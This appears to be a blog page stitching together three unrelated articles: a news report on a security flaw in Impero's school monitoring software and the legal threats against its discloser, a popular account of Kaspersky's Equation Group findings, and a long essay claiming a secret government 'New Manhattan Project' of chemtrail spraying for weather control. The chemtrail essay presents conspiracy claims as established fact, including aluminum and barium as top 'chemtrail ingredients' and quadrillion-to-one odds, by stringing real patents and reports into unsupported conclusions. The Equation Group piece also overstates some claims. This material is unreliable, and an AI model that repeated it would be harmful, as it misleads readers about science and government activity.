Clark said the flaw he found would leave affected schools’ networks “completely pwned”, online slang meaning in this context that the networks’ security would be fully compromised and information on it would be rendered vulnerable.

He said he had posted it publicly, rather than privately disclosing it to the company, for several reasons. “One was that I was against the ‘anti-extremism’ stuff, the other was because not being a customer, I didn’t know where to send it.”

Schools using Impero’s software said the company had notified them of the security flaw in the middle of last month but they were offered few details of its potential scale.

One school IT manager said the response from Impero was vague and required managers to contact the firm for more information. “Impero are crap at communication,” he said.

Three schools and chains using the software that were approached by the Guardian said the company had been slow to deliver promised software patches. Impero also offered fixes to schools that were using the software without contractual support, but left it up to those schools to make contact.

One school said the most recent update on the situation from Impero arrived by email on Monday.

The company is known on school tech forums for its pushy sales techniques, but the software remains popular because of the lack of quality alternatives.

Impero stressed that no data had been compromised, it had already issued a temporary fix for the vulnerability and it would install a full solution before the start of the next academic year.

“On 13 June 2015, we were made aware that someone had maliciously and illegally hacked our product, subsequently making this hack public rather than bringing it to our attention privately and in confidence. No customers have been affected by this and no data has been leaked or compromised,” it said.

“We immediately released a hot fix, as a short-term measure, to address the issue and since then we have been working closely with our customers and penetration testers to develop a solid long-term solution. All schools will have the new version, including the long-term fix, installed in time for the new school term.”

The company said “the methods used to identify and communicate this particular issue were not legal” and they would take a “firm stance”.

“Impero Education Pro is designed to protect and safeguard children in schools and any attempt to jeopardise this by illegally obtaining and publicising sensitive information will be dealt with appropriately,”it said.

On Monday, a month after Clark first disclosed the software vulnerability, lawyers acting for Impero demanded in a letter that he should remove all of his online postings about the company, under the threat of civil proceedings for breach of confidence and copyright infringement and criminal proceedings under the computer misuse act. The letter admits the potential seriousness of the vulnerability Clark disclosed in schools’ systems.

“By publicising the encryption key on the internet and on social media and other confidential information, you have enabled anyone to breach the security of our client’s software program and write destructive files to disrupt numerous software systems throughout the UK,” it said.

Impero said the hack “could only be exploited if basic network security does not exist” and would require the hacker to be physically present in a school.

Publicly disclosing details of security vulnerabilities is a controversial practice in the online security world. Some believe private disclosure is better initially, as it gives companies time to fix flaws before they are made public, but it rarely results in legal action.

Mustafa al-Bassam, a security engineer and former member of the hacking collective Lulzsec, said the legal threat against Clark was bizarre, especially when such exploits can be used or sold for profit, rather than posted online to be fixed.

“Responding with a legal threat to a security researcher that highlighted a serious security flaw in your software is bizarre and shows utter disregard for customers,” he said.

“Unfortunately it shows a theme that is too common in the software industry: companies view security as an external PR issue because it often affects their customers more than it affects them. And they should be grateful that this security flaw was disclosed publicly instead of being sold to malware developers like Hacking Team.”

Impero’s Education Pro software serves a variety of roles in schools’ systems, including blocking inappropriate web surfing – such as adult sites – and monitoring students’ activity, as well as rationing printing and making IT administration simpler.

However, last month – just days before Clark discovered the flaw – the Guardian reported Impero was offering a new feature to monitor keywords potentially tied to terrorism or extremism before the implementation of new counter-terrorism legislation introducing a requirement on schools to monitor pupils for such signs.

The pilot, introduced in 16 UK schools and five in the US, monitors for phrases such as “YODO” – You Only Die Once – “War on Islam”, and “Storm Front”, a neo-Nazi group.

The Department for Education said: “We have been clear that schools are expected to ensure that sensitive pupil information is held securely. The Data Protection Act of 1998 is clear what standards schools are expected to adhere to and we provide guidance on this.”

 

sources:

https://TheGuardian.com

https://pdf.yt/d/fRcZ1TWHaDkwz-Ea

 

Mysterious Shadow Hackers: The Equation Group

Mysterious Shadow Hackers: The Equation Group

An unnamed scientific researcher walks out to her mailbox, shuffles through some bills and advertisements, and pulls out an envelope containing a CD of pictures from a recent scientific conference the researcher had attended in Houston. Excited – though maybe a bit nervous – to see the candid photos of herself and her colleagues snapped by an excitable event photographer, the researcher walks inside, casually drops the unopened bills on the kitchen table, opens up her laptop, and slides in the CD. Windows asks if she’d like to open the pictures to view them. She accepts, and the pictures pop up in the photo viewer. One by one she clicks through them, viewing the photos from the event. She reminisces fondly, wincing only at that one photo where she looks either drunk or high, making mental note of the pictures to print out for her lab desk.

What the researcher doesn’t see, however, is a malicious payload – a virus, one of the most sophisticated known to man – secretly installing itself in the background of her computer. This virus would give a certain secret group of individuals complete access to her system, a group which had hijacked the package mid-transit in the mail, replaced the original CD with a copy that included the virus, taped everything back up without evidence of tampering, and sent the package on its way to her. The virus was practically untraceable and completely irremovable; it could map out networks, jump to computers not connected via the Internet, and even selectively target and destroy specific computers much like a bioengineered nano-virus – all at the direction of a secret shadow organization that was covertly infiltrating the world’s most secure computer systems.

The Equation Group

What may sound like the start to a Tom Clancy novel, or an episode of 24, is, in fact, completely real, the likes of which actually happened to one or more researchers back in 2009. In fact, surreptitious, interdiction-based cyberattacks like this one have apparently been happening since at least the early 2000s and may date back to 1996.

Last Monday, Moscow-based Kaspersky Lab released a cybersecurity report uncovering details about the most sophisticated, covert, and pervasive hacker groups known to man and possibly ever imagined. The organization, dubbed the Equation Group due to the group’s affinity towards sophisticated encryption methods, had operated practically undetected for over a decade, silently infecting computers across the globe and delivering attack payloads still unknown.

“There is nowhere I can’t go. There is nowhere I won’t find you.” – Bane, The Matrix Revolutions

Kaspersky Lab, a cybersecurity firm known primarily for its antivirus software, is no stranger to hackers. The company tracks and documents security breaches of all shapes and sizes.

For years, most high-profile computer hacks had been primarily the work of individuals or small groups motivated by curiosity or, more recently, financial interest – gray-collar criminals who would infiltrate computer systems for credit card numbers to sell on the black market. Usually these attacks are relatively unsophisticated, relying on bad operational cybersecurity practices (dubbed “opsec”) from corporations to create exploitable security holes like those seen in the recent Target and Home Depot security breaches. Only upon the discovery of the Stuxnet virus in June 2010 that sabotaged Iran’s Natanz uranium enrichment facilities have cybersecurity researchers and the public at large turned an eye towards advanced persistent threats (APTs) which use advanced hacking techniques capable of bypassing strong opsec protocols.

What make Equation Group so impressive are their “almost superhuman” technical feats, which include never-before-seen levels of ingenuity in hacking, engineering, and encryption. Those feats include:

  • using virtual file systems like those found in the Regin (a.k.a. WarriorPride) malware attack used by the NSA to infect overseas computers;
  • the ability to infect and surveil sensitive air-gapped (i.e. non-Internet connected) networks by piggybacking on USB flash drives, much like the Stuxnet virus;
  • encrypting malicious files and storing them in multiple branches of the Windows registry, making it immune to detect with antivirus software;
  • using over 300 Internet domains and 100 servers to command and control malware infrastructure; and
  • hijacking URL requests on iPhones to spoofed Mac servers, which indicates that Equation Group has compromised the iOS and OSX operating systems.

Hollywood good

Perhaps most impressive is an Equation Group malware platform that rewrites the firmware of infected hard drives, allowing the virus to survive even low-level reformatting that is used to securely wipe a hard drive. All major hard drive manufacturers have drive models that have been compromised, including Western Digital, Seagate, Maxtor, Samsung, IBM, Toshiba, and Micron. Once the drive has been infected, the malware is completely impossible to detect or remove; the drive is compromised forever.

Forensics software displays, in Matrix-like fashion, some of the hard drives Equation Group was able to successfully hijack. (Credit: Kaspersky)

Forensics software displays, in Matrix-like fashion, some of the hard drives Equation Group was able to successfully hijack. (Credit: Kaspersky)

The difference in sophistication between your average Internet hacker and Equation Group cannot be understated. Your run-of-the-mill hacker is more or less equivalent to your run-of-the-mill burglar, who might break into a place with all of the sophistication of opening an unlocked door or busting out a window with a crowbar. APTs are more like museum thieves who might dress up like a guard or clone a keycard to snatch a valuable diamond or painting. Equation Group is an APT well beyond its peers, using super-spy tactics with analogical laser grids, vent shafts, and harnesses to swap a diamond with a perfect replica, remaining entirely undetected. It’s the stuff of Hollywood’s Mission: Impossible, only without the gratuitous explosions and Tom Cruise (…at least as far as anyone knows). And like Mission: Impossible, Equation Group is more than likely a clandestine operation of the U.S. government.
via RedOrbit

Chemtrails Exposed: A History of the New Manhattan Project

Chemtrails Exposed: A History of the New Manhattan Project

“Discoveries and inventions are not terminals; they are fresh starting points from which we can climb to new knowledge.” – Dr. Willis R. Whitney, founder of General Electric Laboratories

After so many years of watching airplanes produce the lines in the sky, largely without knowing of what this Project consists or why, we have recently gained an understanding. Evidence suggests that today’s chemtrail spraying operations consist of airplanes saturating our atmosphere with nano-sized particles influenced by electromagnetic energy for the purpose of weather modification.

U.S. patent #4,686,605 “Method and Apparatus for Altering a Region in the Earth’s Atmosphere, Ionosphere and/or Magnetosphere” shows how stratospheric and tropospheric aerosols can be manipulated using electromagnetic energy in order to modify the weather. The ground-based antennas (known as ionospheric heaters) needed to produce the appropriate electromagnetic energy exist. For a detailed discussion, please see the author’s previous article “Smoking Gun: The HAARP and Chemtrails Connection.”

The 1996 U.S. military document “Weather as a Force Multiplier: Owning the Weather in 2025” outlines a program using aerosols sprayed from airplanes which are then manipulated with electromagnetic energy in order to modify the weather. This document will be discussed shortly.

The common thread here is weather modification; or as the Library of Congress calls it, “weather control.” Lots of other evidence supporting this assertion exists as well, but these two documents are the most salient.

Motives are plenty. Most notably, significant direct benefits can be gained by playing financial markets which rise and fall with the weather such as the weather derivatives and catastrophe reinsurance markets; not to mention agricultural and energy commodities. Enron pioneered the markets. With foreknowledge of the weather, so many scams could be concocted that it boggles the mind. Weather routinely changes the course of Human history. It determines what we do every day. It determines the outcomes of wars and influences elections. Control of the weather is God-like power. Money and power junkies want it.

Controlling Earth’s weather would necessarily require a gigantic scientific effort. Oddly enough, when one looks for a National effort in weather modification, one finds a lot. Specifically, if one looks, one can find a history of weather control programs involving electromagnetic energy and atmospheric particles; all in a coherent chronological order.

This paper is the result of thousands of dollars and countless hours spent researching many thousands of pages of source, organizational and Government documents related to weather modification and the atmospheric sciences. This article serves as the foundation for a series of shortly forthcoming articles detailing the history and current state of this Project. May this work help end the spraying. For the fact that these environmental modifications have been done without our informed consent, may this work contribute to the largest class-action lawsuit in history.

This paper examines the origins and development of this; the first planetary level scientific endeavor. Now is our opportunity to gain a deeper understanding of the New Manhattan Project.

The Origins of Weather Modification

People have been attempting to modify the weather for ever. Most commonly, man has gone about making it rain; especially in times of drought. The earliest recorded efforts were those of mystics. Local shaman would be called upon to ingest a certain concoction in order to communicate with the weather gods and ask for help. In some cases, the sacrifice of certain animals in certain fashions may have been the thing to do. Sometimes a good old rain dance may have done the trick.

Some early Western efforts to stop destructive weather are outlined in professor James Fleming’s book Fixing the Sky. On page 78 he writes, “In ancient Greece, the official ‘hail wardens’ of Cleonae were appointed at public expense to watch for hail and then signal the farmers to offer blood sacrifices to protect their fields: a lamb, a chicken, or even a poor man drawing blood from his finger was deemed sufficient.”

A little later professor Fleming writes, “In Austria, it was traditional to ring ‘thunder bells’ or blow on huge ‘weather horns’ while herdsmen set up a terrific howl and women rattled chains and beat milk pails to scare away the destructive spirit of the storm.”

Much of the early Western attempts at weather modification involved the detonation of explosive charges in the lower atmosphere. It was hypothesized that atmospheric explosions cause precipitation.

Early American Involvement

Although there has been much international participation, this article focuses on America’s participation in the New Manhattan Project. Throughout the development of the New Manhattan Project, America was the world’s technological leader; especially in the area of military technology. America led the way and developed most of this Project. America continues to lead the Project today. Therefore the early history of weather modification in America is relevant.

James Pollard Espy (1785-1860) also known as “The Storm King” was the first meteorologist in U.S. government service. Although he never received Federal funding for it, he suggested that forest fires can produce rainfall and that experiments in this area should be carried out. His magnum opus was a book called The Philosophy of Storms. This book contains a long section entitled “Artificial Rains.”

The first Federally funded weather modification field effort took place in Texas in 1891, with funds appropriated by the Congress in the amount of nine thousand dollars through the Department of Agriculture. The experiment involved weather modifier Robert St. George Dyrenforth (1844-1910) attacking the atmosphere with balloons, kites, dynamite, mortars, smoke bombs and fireworks. The results were inconclusive, but you can bet that the atmosphere was absolutely terrified!

From these early efforts until the beginning of the scientific era in 1946, the realm of weather modification was inhabited largely by a motley collection of pseudo-scientists and con artists similar to Dyrenforth. These people, who referred to themselves as “rainmakers,” traveled around the Country (mostly the West), going where local governments were willing to pay for their services. If a certain region was experiencing a severe drought, people were often desperate for solutions. These rainmakers’ activities often involved the mixing and open air release of dangerous chemicals. Some of these efforts were Federally funded. Since the days of Robert Dyrenforth, the Federal money has not stopped flowing.

Nikola Tesla

In the late 1800s, inventor Nikola Tesla (1856-1943) popularized the use of electromagnetic energy. In his 1905 United States patent number 787,412 “Art of Transmitting Electrical Energy Through the Natural Mediums” Tesla describes how electromagnetic energy may be sent and received through the atmosphere. The Supreme Court found that U.S. patent #645,576 “System of Transmission of Electrical Energy” proves he invented radio; not Marconi. He pioneered radar. He invented wireless signal and power transmission. Yes, power can be transmitted wirelessly; we’ll have more about that later.

Tesla’s musings and scientific discoveries pioneered what are today’s ionospheric heaters which use electromagnetic energy to cause atmospheric perturbations from great distances and play a defining role in the New Manhattan Project. Specifically, he pioneered the use of a certain type of electromagnetic energy called extremely-low frequency (ELF). This is a specific type of energy known to be used in the New Manhattan Project; the other being very-low frequency (VLF) electromagnetic energy.

In her book Tesla: Man Out of Time, Margaret Cheney writes that he did a good deal of theorizing about weather control. She also writes that he theorized that the entire earth might be illuminated by shooting electromagnetic energy 35,000 feet up into the atmosphere. 35,000 feet is about the altitude of today’s offending airplanes.

The Beginning of the Scientific Era

The scientific era of weather modification began famously in 1946 with a trio of scientists from General Electric Laboratories: Irving Langmuir, Vincent Schaefer and Bernard Vonnegut. Leading the group was the world famous Nobel Peace Prize winning scientist Irving Langmuir (1881-1957). This trio popularized the fact that, under certain circumstances, dumping substances from airplanes into clouds causes precipitation. Early experiments used dry ice while later experiments pioneered the use of silver iodide. Also invented were silver iodide generation equipment and many other weather related scientific instruments. Much of this trio’s work here was done in cooperation with the Office of Naval Research and the Air Force. Although others had previously dumped stuff out of airplanes in attempts to modify the weather, the G.E. scientists practiced a sound scientific method previously unseen in the field.

Schaefer, Langmuir & Vonnegut
image source: General Electric Laboratories

Following the famous scientific weather modification efforts of the G.E. Labs trio, the public’s imagination was sparked and a government regulated weather modification industry flourished. To this day, the government-regulated weather modification industry (or “conventional” weather modification industry as we will call it) expels dry ice, lead iodide or silver iodide (usually silver iodide) from airplanes.

However, the conventional weather modification industry is distinct from the New Manhattan Project and therefore is not the focus of this article. The New Manhattan Project employs electromagnetic energy to manipulate dispersed particles while conventional weather modifiers do not. Also, conventional weather modification efforts are conducted on a regional basis while the New Manhattan Project is global.

Not long after the scientific breakthroughs of the G.E. Labs trio, fueled by high level political rhetoric and popular interest, the United States federal government began pouring hundreds of millions of dollars annually into basic atmospheric research. Since then, the United States government is admitted to have spent many tens of billions of dollars on weather modification and the atmospheric sciences. Much of that was expended in 1950s, ’60s and ’70s dollars. If one is to control the weather, one must know how the atmosphere works. Or as geoengineer Dr. Clement J. Todd wrote in 1970, “Our ability to manage precipitation depends upon four factors: (1) understanding the physical processes of the atmosphere, (2) real-time knowledge of the weather we wish to manipulate, (3) devising the optimum treatment material and technique, and (4) delivery of that treatment to the cloud where and when we wish.”

The majority of the vast expanses of literature pertaining to weather modification and the atmospheric sciences is geared towards conventional weather modification. However, both the New Manhattan Project and conventional weather modification are supported by basic atmospheric research. So, buried in this body of literature, one may find glimpses of the New Manhattan Project. The rest of this paper recounts these glimpses.

Bernard Vonnegut

One member of the G.E. Labs trio, Bernard Vonnegut (1914-1997) went on to pioneer weather modification research involving the use of artificial electric charges and atmospheric aerosols. His work in this area was performed under Government contracts outsourced to a research and development firm called Arthur D. Little Inc.

Bernard Vonnegut
image source: Life Magazine

The earliest recorded instances of electricity being intentionally used to modify particles in the atmosphere can be found in the 1884 experiments of Sir Oliver Lodge (1851-1940). The 1918 U.S. patent #1,279,823 “Process and Apparatus for Causing Precipitation by Coalescence of Aqueous Particles Contained in the Atmosphere” by J.G. Balsillie built upon Lodge’s work. Using this knowledge as a basis, Mr. Vonnegut resumed Lodge’s work; this time with massive funding and modernized scientific equipment.

Beginning in 1953, Bernard Vonnegut, Arthur D. Little et al., conducted experiments involving stainless steel wires miles long strung from the tops of telephone poles, connected to a power supply and discharging corona. The coronal discharge’s effect upon ambient aerosols and the clouds above was monitored and analyzed. Through 1961, these experiments were carried out in Massachusetts, New Hampshire, Texas, Illinois and New Mexico. These types of experiments are referred to as “space charge” experiments. The U.S. Signal Corps and the U. S. Coast Guard provided support. Others performed similar experiments.

Space charge experiment
image source: The Massachusetts Institute of Technology

The 1958 “Final Report of the Advisory Committee on Weather Control” contained an article by Bernard Vonnegut, Vincent Schaefer, J. S. Barrows and Paul MacCready titled “The Future.” In it they outline an atmosphere saturated with “chemicals” and “altering” atmospheric electrical variables. It reads:

When the nature of thunderstorm electrification is understood it may prove possible to control this process by the introduction of chemicals into the atmosphere or by altering electrical variables. Such variables might be atmospheric conductivity, field, and space charge, or perhaps the corona giving properties of the earth’s surface.

When we become sufficiently sophisticated concerning the dynamics of the atmosphere it is possible that weather may be controlled by the large scale release of chemical or more probably thermonuclear heat energy.

In 1961, Bernard Vonnegut, Arnold W. Doyle and D. Read Moffett wrote a paper for Arthur D. Little titled “Research in Electrical Phenomena Associated with Aerosols.” This was a report about their experiments of the previous 3 months involving the effects of electromagnetic energy upon a grounded sphere in a small chamber surrounded by gas. Please consider the implications of that. We will revisit this paper much later.

If you are wondering… yes, Bernard Vonnegut was related to the novelist Kurt Vonnegut. They were brothers.

***

In 1958 the chief White House advisor on weather modification, Captain Howard T. Orville, said the U.S. defense department was studying “ways to manipulate the charges of the earth and sky and so affect the weather” by using an electronic beam to ionize or de-ionize the atmosphere over a given area.

***

The Department of Commerce Weather Bureau reported in 1960 that they were conducting a weather modification study in which, “Chemicals are introduced into the cloud which noticeably changes the surface tension of the droplets. Electrification effects are being observed by artificially electrifying the droplets and subjecting them to impressed electric fields.”

***

For better or for worse, this super secret program had a prophet. His name was United States Navy Admiral William Francis Raborn (1905-1990).

William Francis Raborn
image source: United States Navy

In the January 1963 edition of the U.S. Naval Institute Proceedings, Admiral Raborn outlined a program using electromagnetic energy to modify the weather. His article was entitled “New Horizons of Naval Research and Development.” In this paper, underneath the heading of ‘Environmental Warfare’ he wrote:

The possibilities for the military employment of the “weather weapon” may be as diverse as they are numerous. An ability to control the weather could introduce greater changes in warfare than those which occurred in 1945 with the explosion of the first nuclear weapons.

A severe storm or hurricane striking a naval force may well inflict greater damage than could an enemy. The capability to change the direction of destructive storms and guide them toward enemy concentrations may exist in the future arsenal of the naval tactical commander.

Ground, sea, air and amphibious operations might be supported by the dissipation of fog or clouds, or by the production of rain or drought. Conversely, the creation of solid, low overcasts might be used to conceal troop concentrations, movements, and task force deployments. Large-scale weather control techniques might be used to cause extensive flooding in strategic areas or even to bring a new “ice age” upon the enemy. By influencing the ionosphere and atmosphere simultaneously, magnetic, acoustic, and pressure effects might be generated in such a way that ocean-wide sweeping of mines would occur.

Creating or dissipating atmospheric temperature/humidity ducts might modify the refractive index of the atmosphere enough to influence radar or radio transmission. Artificially-induced ionospheric storms might produce a blackout of communications.

Certain electromagnetic waves are unable to pass through an area of precipitation. A cloud seeding generator could be employed under appropriate meteorological conditions to produce precipitation that would interfere with the operation of radio-guided or remotely-controlled devices or vehicles. We already have taken our first steps toward developing an environmental warfare capability. We are using satellite weather data from Tiros II for current, tactical operations and more accurate, long-range weather predictions. Some experiments in fog dissipation have shown promise, and some exploratory research has been conducted on ways to change the heading of major storms.

For these reasons – and because our advances in science make it reasonable – we are now engaged in planning a ten-year, comprehensive study of the atmosphere, a study which we will designate ATMOS. This plan will be co-ordinated with our TENOC oceanographic studies.

About the ATMOS program, the author has failed to find any other significant information. The author has looked over a 1961 report pertaining to the Navy TENOC (Ten Year Program in Oceanography) program. Although it did not contain any specific information pertinent to the New Manhattan Project, it did make mention of another, classified TENOC report.

It is notable that the title of Raborn’s article includes the word “horizon” because the type of electromagnetic energy to which he refers is akin to “over the horizon radar.” This type of radar is called “over the horizon” because it is bounced off the ionosphere and therefore is effective far beyond the range of the forty miles or so (depending on terrain) afforded by previous radar systems. Forty miles is approximately the distance one can see over flat land or sea before the curvature of the Earth obscures points beyond. Over the horizon radar, on the other hand, is effective to thousands of miles. Today’s ionospheric heaters evolved as over the horizon radar.

Also of note is the fact that the United States Navy, of which Mr. Raborn was an admiral, is today one of the managers of the HAARP facility in Alaska. The HAARP facility contains the world’s most powerful ionospheric heater which is documented to be able to modify the weather.

***

In the 1967 National Science Foundation’s ninth annual weather modification report, it reads, “ESSA [Environmental Science Services Administration] is also investigating the effect of cirrus clouds on the radiation budget of the atmosphere by studying aircraft-produced contrails which often spread into cirrus layers covering considerable fractions of the sky. One technique proposed for modifying lower cloud development has been the generation of a high level cirrus deck with jet aircraft. By intercepting solar radiation at high altitude it may be possible to influence larger scale cloud development elsewhere by reducing solar input and reducing convective cloud generation in areas where they are not needed.” This is essentially today’s geoengineering thesis.

A little later in that same report, it reads that their computer atmospheric simulations, or ‘models’ as they call them, might simulate, “…producing high-level cirrus cloud cover over an area by means of jet aircraft, inserting particulate matter into the upper atmosphere to alter the solar radiation balance and the like.”

***

In 1966, the Interdepartmental Committee on Atmospheric Sciences Select Panel on Weather Modification produced a document titled “Present and Future Plans of Federal Agencies in Weather-Climate Modification.” On page 17 of this report, it reads, “It is anticipated that there will be a few large-scale facilities funded for the testing of modification schemes. Typical schemes might be the suspension of a spray nozzle over a valley between two mountain peaks to produce cloud-sized droplets into which electrical charges can be introduced in either polarity, contaminants can be introduced, and the drop size spectrum can be adjusted to any reasonable distribution.” The Interdepartmental Committee on Atmospheric Sciences subsequently agreed to proceed with the development of a National Weather Modification Program along the lines of this report.

The now defunct Interdepartmental Committee for Atmospheric Sciences (ICAS) was created by the Federal Council for Science and Technology in 1959 in order to oversee and coordinate a wide range of basic atmospheric research originating from many previously disparate government offices. Their focus was weather modification. Members of the ICAS included the departments of Agriculture, Commerce, Defense, Interior, Transportation and State as well as the Environmental Protection Agency, the Energy Research and Development Administration, the National Aeronautics and Space Administration and the National Science Foundation. These are the government agencies which have been involved in weather modification all along.

The ICAS produced a series of semi-annual reports between 1960 and 1978. In these reports, ICAS member organizations’ weather related scientific activities and expenditures were recounted. The ICAS reports’ areas of study included: Earth’s natural geomagnetic energy, different ways clouds form and different ways they precipitate, lightning, hurricanes and other extreme weather, inadvertent weather modification, intentional weather modification and extra-planetary atmospheres. The ICAS is duly noted here because so much of the history of the New Manhattan Project is accounted for in the pages of their reports.

In the 1969 ICAS report, under the heading of “Cloud Electricity Modification,” it is written that the National Science Foundation is developing, “Means for injecting significant quantities of charge artificially into clouds…”

Again in this 1969 report, on page 37 it describes the Army’s intentions in the area of weather modification. It reads, “Studies will continue on upper atmospheric structure and dynamics, lasers and other electromagnetic propagation, and acoustic propagation. New approaches to atmospheric modification will be studied.”

On page 42 of the 1971 ICAS special report “A National Program for Accelerating Progress in Weather Modification,” the authors write of fog being cleared by airplanes releasing chemicals and ‘electrical methods’ of fog dissipation.

On page 79 of the 1973 ICAS report, it is written, “There is a great deal to be learned before we can with confidence say what effect can be produced by the injection of chemically active trace gasses and particulates into the lower stratosphere. New emphasis has been given to both dynamical and physical meteorological research relevant to this question.”

***

United States patent #5,003,186 “Stratospheric Welsbach Seeding for Reduction of Global Warming” was filed by the Hughes Aircraft Corporation in 1991. The patent describes a method for dispersing particulates into the upper atmosphere in order to save us from global warming. The author David B. Chang suggests that aluminum oxide be used for this purpose. Lab tests from around the world have shown aluminum to be the number one chemtrail ingredient.

“One proposed solution to the problem of global warming,” it reads, “involves the seeding of the atmosphere with metallic particles. One technique proposed to seed the metallic particles was to add the tiny particles to the fuel of jet airliners, so that the particles would be emitted from the jet engine exhaust while the airliner was at its cruising altitude.”

The first mention of aluminum occurs in this passage, “The method comprises the step of seeding the greenhouse gas layer with a quantity of tiny particles of materials characterized by wavelength-dependent emissivity or reflectivity, in that said materials have high emissivities in the visible and far infrared wavelength region. Such materials can include the class of materials known as Welsbach materials. The oxides of metal, e.g., aluminum oxide, are also suitable for the purpose.”

The second mention of aluminum occurs a little later. It reads, “Another class of materials having the desired property includes the oxides of metals. For example, aluminum oxide (Al2O3) is one metal oxide suitable for the purpose and which is relatively inexpensive.”

The Hughes Aircraft Corporation was acquired by and is now integrated into Raytheon.

***

A 1994 document produced by Stanford Research International called “Multiple Instrument Studies of Chemical Releases and Heating at Arecibo” details three barium releases of 48 kilograms each over Puerto Rico. The barium clouds produced by these rocket-borne explosions were subsequently hit with man-made electromagnetic energy from an ionospheric heater and thus turned into a plasma. Barium has been found to be the number two chemtrail ingredient.

***

In 1996 the Air Force produced a previously mentioned document called “Weather as a Force Multiplier: Owning the Weather in 2025.” The document was produced by the Department of Defense and written as ordered by the chief of staff of the Air Force, Ronald R. Fogleman. “Owning the Weather” was but one in a series of 39 documents speaking to a great overhaul of Air Force operations to be achieved by the year 2025. The larger set of documents is called “Air Force 2025.” “Owning the Weather” describes a system of weather modification combining atmospheric aerosols with electromagnetic energy.

On page 2 the document reads, “Prior to the attack, which is coordinated with forecasted weather conditions, the UAVs begin cloud generation and seeding operations. UAVs [unmanned aerial vehicles] disperse a cirrus shield to deny enemy visual and infrared (IR) surveillance. Simultaneously, microwave heaters create localized scintillation to disrupt active sensing via synthetic aperture radar (SAR) systems such as the commercially available Canadian search and rescue satellite-aided tracking (SARSAT) that will be widely available in 2025. Other cloud seeding operations cause a developing thunderstorm to intensify over the target, severely limiting the enemy’s capability to defend. The WFSE monitors the entire operation in real-time and notes the successful completion of another very important but routine weather-modification mission.”

The document mostly speaks to military combat applications, but there are some very interesting quotes. Here’s one, “In the United States, weather-modification will likely become a part of national security policy with both domestic and international applications.” Let’s hear more about those “domestic applications”

On page 34 the document reads, “The ability to modify the weather may be desirable both for economic and defense reasons.”

Also in 1996, as part of the same series containing “Owning the Weather,” the Air Force produced a document entitled “An Operational Analysis for Air Force 2025” which briefly outlines something they call a “weather analysis and modification system.” This system is described as employing both particulate seeding and microwave energy for the purpose of weather modification.

Under the heading of “Weather Analysis and Modification System,” the document reads, “A global network of sensors provides ‘weather warriors’ with the means to monitor and accurately predict weather activities and their effects on military operations. A diverse set of weather modification tools allows manipulation of small-to-medium scale weather phenomena to enhance friendly force capabilities and degrade those of the adversary.”

***

In the mid-nineties, Lawrence Livermore Laboratories scientists Edward Teller, Lowell Wood and Roderick Hyde wrote a series of papers calling for the spraying of megatons of aluminum to save us from global warming. The mid-nineties was when reports of chemtrail spraying in American skies began pouring in. If you will recall, aluminum has been found to be the number one chemtrail ingredient.

In their 1997 paper “Global Warming and Ice Ages,” the Livermore Labs trio wrote, “It has been suggested that alumina injected into the stratosphere by the exhaust of solid-rocket motors might scatter non-negligible amounts of sunlight. We expect that introduction of scattering-optimized alumina particles into the stratosphere may well be overall competitive with use of sulfur oxides; alumina particles offer a distinctly different environmental impact profile.”

They continue to espouse the virtues of stratospheric alumina in the footnotes writing, “Alumina, like sulfate, is ubiquitous in the terrestrial biosphere, and its stratospheric injection seemingly poses no significant environment issues.”

In conclusion

So there you have an evolutionary history of a project employing sprayed particles and the electrification of clouds for the purpose of weather modification. Is this a coincidence? Are all these examples simply isolated, one-off events not a part of a larger overall plan? What are the odds of these data points evolving in a chronological order such as they have without being part of a coordinated effort? One may be looking at something like a quadrillion to one; and that is conservative.

For five days only, from Thursday, February 19 through Monday, February 23, my ebook Chemtrails Exposed will be available for free from Amazon.

Stay tuned. God willing, this article is only the first of many coming in this year; 2015. The heavy lifting (studying the history of weather modification) is complete. The next papers will come much easier because they involve smaller topics and half or more of the work on each is already done. Although the topic will remain secret until publication, you can expect the next article in a couple of months, possibly sooner. Until then, keep firing in the information war. Thank you.

Notes:

Adventure into the Unknown: the first 50 years of the General Electric Research Laboratory by Laurence A. Hawkins, published by William Morrow & Company, 1950

U.S. patent #4,686,605 “Method and Apparatus for Altering a Region in the Earth’s Atmosphere, Ionosphere and/or Magnetosphere,” 1987

“Weather as a Force Multiplier: Owning the Weather in 2025” by Col. Tamzy J. House, Lt. Col. James B. Near, Jr., LTC William B. Shields (USA), Maj. Ronald J. Celentano, Maj. David M. Husband, Maj. Ann E. Mercer and Maj. James E. Pugh, published by the United States Air Force, 1996

The Smartest Guys in the Room by Bethany McLean and Peter Elkind, published by the Penguin Group, 2004

The Weather Changers by D.S. Halacy, Jr., published by Harper and Row, 1968

Fixing the Sky by James Roger Fleming, published by Columbia University Press, 2010

U.S. patent #787,412 “Art of Transmitting Electrical Energy Through the Natural Mediums,” 1905

U.S. patent #645,576 “System of Transmission of Electrical Energy,” 1900

Tesla: Man Out of Time by Margaret Cheney, published by Simon & Schuster, 1981

Early History of Cloud Seeding by Barrington S. Havens, published by the Langmuir Laboratory at the New Mexico Institute of Mining and Technology, the Atmospheric Sciences Research Center at the State University of New York at Albany and the Research and Development Center of the General Electric Company, 1978

Interdepartmental Committee for Atmospheric Sciences reports 1960-1978, published by the Federal Council for Science and Technology

“Department of the Interior Program in Precipitation Management for 1970” by Dr. Clement J. Todd as it appeared in the “Proceedings of the Twelfth Interagency Conference on Weather Modification” 1970

U.S. patent #1,279,823 “Process and Apparatus for Causing Precipitation by Coalescence of Aqueous Particles Contained in the Atmosphere”

“Technique for Introducing Low-Density Space Charge into the Atmosphere” by B. Vonnegut, K. Maynard, W.G. Sykes and C.B. Moore, published by Arthur D. Little and the Journal of Geophysical Research, volume 66, number 3, March, 1961

“The Future” by Bernard Vonnegut, Vincent Schaefer, J. S. Barrows and Paul MacCready, published in the Final Report of the Advisory Committee on Weather Control, p201, 1958

Research in Electrical Phenomena Associated with Aerosols by Bernard Vonnegut, Arnold W. Doyle and D. Read Moffett, published by Arthur D. Little, 1961

Angels Don’t Play this HAARP: advances in Tesla technology by Jeane Manning and Dr. Nick Begich, published by Earthpulse Press, p78, 1995

1st National Science Foundation annual weather modification report, p14, 1960

“New Horizons of Naval Research and Development” by William Francis Raborn, published in U.S.Naval Institute Proceedings, January, 1963

“Ten Year Program in Oceanography: TENOC” by the U.S. Navy, March 13, 1961

9th National Science Foundation annual weather modification report, 1967

“Present and Future Plans of Federal Agencies in Weather-Climate Modification” by the Interdepartmental Committee on Atmospheric Sciences Select Panel on Weather Modification, 1966

